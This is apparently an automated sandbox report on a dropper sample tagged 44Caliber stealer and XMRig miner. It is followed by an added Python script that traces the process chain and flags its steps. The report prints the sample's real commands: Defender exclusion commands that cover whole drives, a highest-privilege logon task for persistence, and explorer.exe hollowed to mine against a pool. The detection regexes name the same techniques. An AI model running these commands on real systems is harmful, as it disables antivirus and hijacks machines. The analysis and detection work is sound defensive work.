Malware Analysis Report

2024-11-13 14:23

Sample ID 220320-fzvv6sheb3
Target 86523374.exe
SHA256 e2d81a70b783df979b49f9caf84b20076533e37068b2db60e6d589eec5bacee4
Tags
44caliber xmrig miner spyware stealer evasion persistence
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e2d81a70b783df979b49f9caf84b20076533e37068b2db60e6d589eec5bacee4

Threat Level: Known bad

The file 86523374.exe was found to be: Known bad.

Malicious Activity Summary

44caliber xmrig miner spyware stealer evasion persistence

xmrig

44Caliber

XMRig Miner Payload

Executes dropped EXE

Modifies Windows Firewall

Checks computer location settings

Drops startup file

Reads user/profile data of web browsers

Loads dropped DLL

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Looks up external IP address via web service

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Enumerates physical storage devices

Program crash

Checks processor information in registry

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Creates scheduled task(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-03-20 05:19

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2022-03-20 05:19

Reported

2022-03-20 05:22

Platform

win10v2004-20220310-en

Max time kernel

167s

Max time network

184s

Command Line

"C:\Users\Admin\AppData\Local\Temp\86523374.exe"

Signatures

44Caliber

stealer 44caliber

xmrig

miner xmrig

XMRig Miner Payload

miner

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\86523374.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Looks up external IP address via web service

Description Indicator Process Target
N/A freegeoip.app N/A N/A
N/A freegeoip.app N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\services64.exe C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\system32\services64.exe C:\Windows\System32\conhost.exe N/A
File created C:\Windows\system32\Microsoft\Libs\sihost64.exe C:\Windows\System32\conhost.exe N/A
File created C:\Windows\system32\Microsoft\Libs\WR64.sys C:\Windows\System32\conhost.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\KLNR.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4624 set thread context of 2432 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\Insidious2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Local\Temp\Insidious2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Insidious2.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\KLNR.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5036 wrote to memory of 4788 N/A C:\Users\Admin\AppData\Local\Temp\86523374.exe C:\Users\Admin\AppData\Local\Temp\KLNR.exe
PID 5036 wrote to memory of 4788 N/A C:\Users\Admin\AppData\Local\Temp\86523374.exe C:\Users\Admin\AppData\Local\Temp\KLNR.exe
PID 5036 wrote to memory of 4788 N/A C:\Users\Admin\AppData\Local\Temp\86523374.exe C:\Users\Admin\AppData\Local\Temp\KLNR.exe
PID 5036 wrote to memory of 4496 N/A C:\Users\Admin\AppData\Local\Temp\86523374.exe C:\Users\Admin\AppData\Local\Temp\Insidious2.exe
PID 5036 wrote to memory of 4496 N/A C:\Users\Admin\AppData\Local\Temp\86523374.exe C:\Users\Admin\AppData\Local\Temp\Insidious2.exe
PID 5036 wrote to memory of 4468 N/A C:\Users\Admin\AppData\Local\Temp\86523374.exe C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe
PID 5036 wrote to memory of 4468 N/A C:\Users\Admin\AppData\Local\Temp\86523374.exe C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe
PID 4468 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe C:\Windows\System32\conhost.exe
PID 4468 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe C:\Windows\System32\conhost.exe
PID 4468 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe C:\Windows\System32\conhost.exe
PID 4788 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\KLNR.exe C:\Windows\SysWOW64\fondue.exe
PID 4788 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\KLNR.exe C:\Windows\SysWOW64\fondue.exe
PID 4788 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\KLNR.exe C:\Windows\SysWOW64\fondue.exe
PID 1572 wrote to memory of 1112 N/A C:\Windows\SysWOW64\fondue.exe C:\Windows\system32\FonDUE.EXE
PID 1572 wrote to memory of 1112 N/A C:\Windows\SysWOW64\fondue.exe C:\Windows\system32\FonDUE.EXE
PID 2136 wrote to memory of 1120 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 2136 wrote to memory of 1120 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 1120 wrote to memory of 1844 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1120 wrote to memory of 1844 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2136 wrote to memory of 2804 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 2136 wrote to memory of 2804 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 2804 wrote to memory of 844 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2804 wrote to memory of 844 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1120 wrote to memory of 1652 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1120 wrote to memory of 1652 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2136 wrote to memory of 4900 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 2136 wrote to memory of 4900 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 4900 wrote to memory of 1100 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\services64.exe
PID 4900 wrote to memory of 1100 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\services64.exe
PID 1100 wrote to memory of 4624 N/A C:\Windows\system32\services64.exe C:\Windows\System32\conhost.exe
PID 1100 wrote to memory of 4624 N/A C:\Windows\system32\services64.exe C:\Windows\System32\conhost.exe
PID 1100 wrote to memory of 4624 N/A C:\Windows\system32\services64.exe C:\Windows\System32\conhost.exe
PID 4624 wrote to memory of 1736 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 4624 wrote to memory of 1736 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 1736 wrote to memory of 1904 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1736 wrote to memory of 1904 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4624 wrote to memory of 2620 N/A C:\Windows\System32\conhost.exe C:\Windows\system32\Microsoft\Libs\sihost64.exe
PID 4624 wrote to memory of 2620 N/A C:\Windows\System32\conhost.exe C:\Windows\system32\Microsoft\Libs\sihost64.exe
PID 1736 wrote to memory of 4156 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1736 wrote to memory of 4156 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4624 wrote to memory of 2432 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe
PID 4624 wrote to memory of 2432 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe
PID 4624 wrote to memory of 2432 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe
PID 4624 wrote to memory of 2432 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe
PID 4624 wrote to memory of 2432 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe
PID 4624 wrote to memory of 2432 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe
PID 4624 wrote to memory of 2432 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe
PID 4624 wrote to memory of 2432 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe
PID 4624 wrote to memory of 2432 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe
PID 4624 wrote to memory of 2432 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe
PID 4624 wrote to memory of 2432 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe
PID 4624 wrote to memory of 2432 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe
PID 4624 wrote to memory of 2432 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe
PID 4624 wrote to memory of 2432 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe
PID 4624 wrote to memory of 2432 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe
PID 2620 wrote to memory of 4468 N/A C:\Windows\system32\Microsoft\Libs\sihost64.exe C:\Windows\System32\conhost.exe
PID 2620 wrote to memory of 4468 N/A C:\Windows\system32\Microsoft\Libs\sihost64.exe C:\Windows\System32\conhost.exe
PID 2620 wrote to memory of 4468 N/A C:\Windows\system32\Microsoft\Libs\sihost64.exe C:\Windows\System32\conhost.exe

Processes

C:\Users\Admin\AppData\Local\Temp\86523374.exe

"C:\Users\Admin\AppData\Local\Temp\86523374.exe"

C:\Users\Admin\AppData\Local\Temp\KLNR.exe

"C:\Users\Admin\AppData\Local\Temp\KLNR.exe"

C:\Users\Admin\AppData\Local\Temp\Insidious2.exe

"C:\Users\Admin\AppData\Local\Temp\Insidious2.exe"

C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe

"C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe"

C:\Windows\SysWOW64\fondue.exe

"C:\Windows\system32\fondue.exe" /enable-feature:NetFx3 /caller-name:mscoreei.dll

C:\Windows\system32\FonDUE.EXE

"C:\Windows\sysnative\FonDUE.EXE" /enable-feature:NetFx3 /caller-name:mscoreei.dll

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\cmd.exe

"cmd" cmd /c "C:\Windows\system32\services64.exe"

C:\Windows\system32\services64.exe

C:\Windows\system32\services64.exe

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\system32\Microsoft\Libs\sihost64.exe

"C:\Windows\system32\Microsoft\Libs\sihost64.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6238470 --pass=GAMENAME --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 452 -p 2432 -ip 2432

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2432 -s 288

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "/sihost64"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 184 -p 2432 -ip 2432

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2432 -s 332
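
Read together, the Processes listing and the WriteProcessMemory rows above describe one chain: 86523374.exe writes GTAHACK.exe, which starts conhost.exe with its own path as the only argument (that conhost.exe is then the process that drops files into System32 and spawns cmd.exe), the cmd.exe children add Defender exclusions with Add-MpPreference, register a highest-privilege onlogon task named services64 pointing at a copy of the dropper in System32 (services64.exe carries the same SHA256 as GTAHACK.exe in the Files section), and conhost.exe PID 4624 finally writes into explorer.exe PID 2432 and resets its thread context, after which explorer.exe runs with an XMRig command line. The Python below is an added example for this page, not part of the sandbox report or the sample: it rebuilds the parent chain from the report's own rows and applies a few command-line rules that catch each of those steps. PIDs and command lines are copied from this page (the explorer.exe line abridged to its telling flags); rule names are this example's own choices.

```python
import re
from collections import defaultdict

# Command lines copied from the Processes listing above, keyed by the PIDs the
# WriteProcessMemory rows give them; the explorer.exe line is abridged to its
# telling flags. Constructed input for this example.
PROCESSES = {
    5036: r'"C:\Users\Admin\AppData\Local\Temp\86523374.exe"',
    4468: r'"C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe"',
    2136: r'"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe"',
    1844: r'powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"',
    1652: r'''powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"''',
    844: r'schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"',
    1100: r'C:\Windows\system32\services64.exe',
    4624: r'"C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"',
    2432: r'C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --url=mine.bmpool.org:6004 --user=6238470 --pass=GAMENAME --cinit-idle-cpu=80 --cinit-stealth',
}

# One row per distinct parent/child pair from the WriteProcessMemory table
# above (the sandbox logs several writes per pair; repeats are collapsed).
WRITE_ROWS = """
PID 5036 wrote to memory of 4788
PID 5036 wrote to memory of 4496
PID 5036 wrote to memory of 4468
PID 4468 wrote to memory of 2136
PID 2136 wrote to memory of 1120
PID 1120 wrote to memory of 1844
PID 2136 wrote to memory of 2804
PID 2804 wrote to memory of 844
PID 1120 wrote to memory of 1652
PID 2136 wrote to memory of 4900
PID 4900 wrote to memory of 1100
PID 1100 wrote to memory of 4624
PID 4624 wrote to memory of 1736
PID 4624 wrote to memory of 2620
PID 4624 wrote to memory of 2432
"""

# (caller, target) from the "Suspicious use of SetThreadContext" row above.
THREAD_CONTEXT = [(4624, 2432)]

# Rule names are this example's own; each pattern keys on a trait the report shows.
RULES = [
    ("defender_exclusion_added",
     re.compile(r"Add-MpPreference\s+-Exclusion(Path|Extension|Process)", re.I)),
    ("schtasks_onlogon_highest",
     re.compile(r"schtasks\s+/create\b.*?/sc\s+onlogon\b.*?/rl\s+highest", re.I)),
    ("xmrig_style_miner_args",
     re.compile(r"--algo=|--url=\S+:\d+|--cinit-stealth|--randomx-", re.I)),
    # The console subsystem starts conhost.exe with a handle value, never with
    # the path of another executable as its argument.
    ("conhost_given_exe_path",
     re.compile(r'conhost\.exe"?\s+"?[A-Za-z]:\\[^"]*\.exe', re.I)),
]

def parse_parents(rows):
    """child PID -> first PID that wrote into it (a creating parent writes the
    child's startup data before anyone else, so the first writer is the parent)."""
    parents = {}
    for m in re.finditer(r"PID (\d+) wrote to memory of (\d+)", rows):
        parents.setdefault(int(m.group(2)), int(m.group(1)))
    return parents

def image_of(cmdline):
    m = re.match(r'"([^"]+)"|(\S+)', cmdline)   # first token, unquoted
    return m.group(1) or m.group(2)

def triage(processes, write_rows, thread_context):
    parents = parse_parents(write_rows)
    findings = defaultdict(list)
    for pid, cmd in processes.items():
        for name, rx in RULES:
            if rx.search(cmd):
                findings[pid].append(name)
        # Miner flags on an image under C:\Windows: a hollowed system binary.
        if ("xmrig_style_miner_args" in findings[pid]
                and image_of(cmd).lower().startswith("c:\\windows\\")):
            findings[pid].append("miner_args_in_windows_image")
    # SetThreadContext by the same PID that already wrote into the target is
    # the write-then-redirect sequence of process hollowing.
    for caller, target in thread_context:
        if parents.get(target) == caller:
            findings[target].append(f"hollowed_by_{caller}")
    return parents, {p: f for p, f in findings.items() if f}

def ancestry(parents, pid):
    """Root-to-leaf PID chain ending at pid."""
    chain = [pid]
    while chain[-1] in parents:
        chain.append(parents[chain[-1]])
    return chain[::-1]

if __name__ == "__main__":
    parents, findings = triage(PROCESSES, WRITE_ROWS, THREAD_CONTEXT)
    for pid, names in findings.items():
        print(" -> ".join(map(str, ancestry(parents, pid))), names)
```

The first-writer heuristic for parentage is good enough for a sandbox trace like this one, where every child is created suspended by its parent; on a live host, use the parent PID from process-creation telemetry instead and keep the write-then-SetThreadContext pairing as the hollowing signal.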

Network

Country Destination Domain Proto
NL 8.238.21.254:80 tcp
NL 8.238.21.254:80 tcp
US 20.189.173.2:443 tcp
US 8.8.8.8:53 freegeoip.app udp
US 188.114.97.0:443 freegeoip.app tcp
NL 8.238.21.254:80 tcp
NL 8.238.21.254:80 tcp
NL 8.238.21.254:80 tcp

Files

memory/5036-134-0x0000000000400000-0x000000000093B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\KLNR.exe

MD5 8563f76405eb62c0e2a62f57992cb413
SHA1 5f7ff11c5f7be4c15fe6a256f4712e6f98dbd918
SHA256 a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838
SHA512 e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823

C:\Users\Admin\AppData\Local\Temp\Insidious2.exe

MD5 198458bfe3e5de2eb6737beb2d54c292
SHA1 59785684874f6b45205db1f96268593c97485dfe
SHA256 d8657c28223f4e125ba12b4cc56dac08f48e5ef24c7e295f640f281ae456bfca
SHA512 7b10151a06424279cd676f78a61fb0245241fe795b2adb6a930bd331686d4a7843f0abd101c339a3f2c2ec341182b19f47f8e8ab1aaa41338a30d03ecbea5842

memory/4496-139-0x00000000007A0000-0x00000000007EA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe

MD5 692461c05ba5cfb84d5fcb2bc56adafd
SHA1 c9df2056da3af20175f9ab1942058ef778c438b2
SHA256 1bd4f98c3c59ba62e79448064f48661c2acbc87d85ecd1556f68a3e23a3c2e2c
SHA512 68cef4b8123f1b0c24adbe6f71817b5fa2df3100d112813cfa73b6c0a148717b9f354409cccb941a42ae9e60493bb4dafc2c99318088be8b9416e8a30776bf46

memory/4496-142-0x00007FFDDE050000-0x00007FFDDEB11000-memory.dmp

memory/4496-143-0x0000000002870000-0x0000000002872000-memory.dmp

memory/2136-144-0x0000025932E40000-0x0000025933061000-memory.dmp

memory/2136-145-0x000002594E250000-0x000002594E252000-memory.dmp

memory/2136-146-0x0000025934DA0000-0x0000025935861000-memory.dmp

memory/2136-147-0x000002594E253000-0x000002594E255000-memory.dmp

memory/2136-148-0x000002594E256000-0x000002594E257000-memory.dmp

memory/2136-149-0x0000025934D20000-0x0000025934D32000-memory.dmp

memory/1844-150-0x0000023817D90000-0x0000023818851000-memory.dmp

memory/1844-151-0x0000023817A20000-0x0000023817A22000-memory.dmp

memory/1844-152-0x0000023817A23000-0x0000023817A25000-memory.dmp

memory/1844-153-0x0000023818BC0000-0x0000023818BE2000-memory.dmp

memory/1844-154-0x0000023817A26000-0x0000023817A28000-memory.dmp

memory/1844-155-0x0000023817A28000-0x0000023817A29000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cadef9abd087803c630df65264a6c81c
SHA1 babbf3636c347c8727c35f3eef2ee643dbcc4bd2
SHA256 cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
SHA512 7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

memory/1652-158-0x000002DE90F30000-0x000002DE919F1000-memory.dmp

C:\Windows\System32\services64.exe

MD5 692461c05ba5cfb84d5fcb2bc56adafd
SHA1 c9df2056da3af20175f9ab1942058ef778c438b2
SHA256 1bd4f98c3c59ba62e79448064f48661c2acbc87d85ecd1556f68a3e23a3c2e2c
SHA512 68cef4b8123f1b0c24adbe6f71817b5fa2df3100d112813cfa73b6c0a148717b9f354409cccb941a42ae9e60493bb4dafc2c99318088be8b9416e8a30776bf46

C:\Windows\system32\services64.exe

MD5 692461c05ba5cfb84d5fcb2bc56adafd
SHA1 c9df2056da3af20175f9ab1942058ef778c438b2
SHA256 1bd4f98c3c59ba62e79448064f48661c2acbc87d85ecd1556f68a3e23a3c2e2c
SHA512 68cef4b8123f1b0c24adbe6f71817b5fa2df3100d112813cfa73b6c0a148717b9f354409cccb941a42ae9e60493bb4dafc2c99318088be8b9416e8a30776bf46

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

MD5 b245679121623b152bea5562c173ba11
SHA1 47cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d
SHA256 73d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f
SHA512 75e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e69c5554cfe965e000e33ee9f1cd88d5
SHA1 ef74e8e9a0113870c87ece51d4e86040b1eeecdc
SHA256 712c2be9f3cff2c74ba7c7cd92208f724c8862277dd8b4f6f2605cc50fb4fdd0
SHA512 6a8e64e11df3fa1aa32f95387f3b43d2ed6f4c996db8cee9110586e4bb9eba604550235b6fa6a41beb6fcc31339cb969a6e79d3fcf1f7d42dcd4655cfee38a16

memory/4624-164-0x000001BFBD500000-0x000001BFBD502000-memory.dmp

memory/4624-163-0x000001BFA4250000-0x000001BFA4D11000-memory.dmp

memory/4624-165-0x000001BFBD503000-0x000001BFBD505000-memory.dmp

memory/4624-166-0x000001BFBD506000-0x000001BFBD507000-memory.dmp

memory/1904-167-0x0000028B2DD40000-0x0000028B2E801000-memory.dmp

memory/1904-168-0x0000028B2D9A0000-0x0000028B2D9A2000-memory.dmp

memory/1904-169-0x0000028B2D9A3000-0x0000028B2D9A5000-memory.dmp

memory/1904-170-0x0000028B2D9A8000-0x0000028B2D9A9000-memory.dmp

memory/1904-171-0x0000028B2D9A6000-0x0000028B2D9A8000-memory.dmp

C:\Windows\system32\Microsoft\Libs\sihost64.exe

MD5 943c340e0da33f95572f0beb0fdf875b
SHA1 d1081ddc04e6d52a737386d85a9193b2326ccf7c
SHA256 118a4f9a80ceef768290e81f123246d4adb50785591ff2de9f7cfecd459b5dc9
SHA512 51b8a3c5aaa54d0b4d0f544be2b2b05b1fef82427db0c614df35de8b654331c0150d72ab146f0b6d2e51356620df4ad70afad616fc1edd5d13c5410e25a06cd5

C:\Windows\System32\Microsoft\Libs\sihost64.exe

MD5 943c340e0da33f95572f0beb0fdf875b
SHA1 d1081ddc04e6d52a737386d85a9193b2326ccf7c
SHA256 118a4f9a80ceef768290e81f123246d4adb50785591ff2de9f7cfecd459b5dc9
SHA512 51b8a3c5aaa54d0b4d0f544be2b2b05b1fef82427db0c614df35de8b654331c0150d72ab146f0b6d2e51356620df4ad70afad616fc1edd5d13c5410e25a06cd5

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9a2c763c5ff40e18e49ad63c7c3b0088
SHA1 4b289ea34755323fa869da6ad6480d8d12385a36
SHA256 517807921c55bd16cd8a8bfae3d5dc19444c66f836b66acd5593e3080acbaf8e
SHA512 3af01926bc7de92076067d158d7250b206d396b3282ee0db43639d04d91bd9ff763acbce12c7822914824984a3c5fdd1b8dbf1ad2ee88233d47f0f808b746bc8

memory/4156-175-0x0000025C1D4A0000-0x0000025C1DF61000-memory.dmp

memory/4156-176-0x0000025C1E016000-0x0000025C1E018000-memory.dmp

memory/4156-177-0x0000025C1E010000-0x0000025C1E012000-memory.dmp

memory/4156-178-0x0000025C1E013000-0x0000025C1E015000-memory.dmp

memory/2432-179-0x0000000140000000-0x0000000140786000-memory.dmp

memory/2432-180-0x0000000140000000-0x0000000140786000-memory.dmp

memory/2432-181-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4156-182-0x0000025C1E018000-0x0000025C1E019000-memory.dmp

memory/4468-183-0x0000023B374F0000-0x0000023B374F6000-memory.dmp

memory/4468-185-0x0000023B377C0000-0x0000023B377C2000-memory.dmp

memory/4468-184-0x0000023B391E0000-0x0000023B39CA1000-memory.dmp

memory/4468-186-0x0000023B377C3000-0x0000023B377C5000-memory.dmp

memory/4468-187-0x0000023B377C6000-0x0000023B377C7000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2022-03-20 05:19

Reported

2022-03-20 05:22

Platform

win7-20220310-en

Max time kernel

4294221s

Max time network

172s

Command Line

"C:\Users\Admin\AppData\Local\Temp\86523374.exe"

Signatures

44Caliber

stealer 44caliber

xmrig

miner xmrig

XMRig Miner Payload

miner

Modifies Windows Firewall

evasion

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c8a9da7fa674aa389aad9af7feb5a543.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c8a9da7fa674aa389aad9af7feb5a543.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
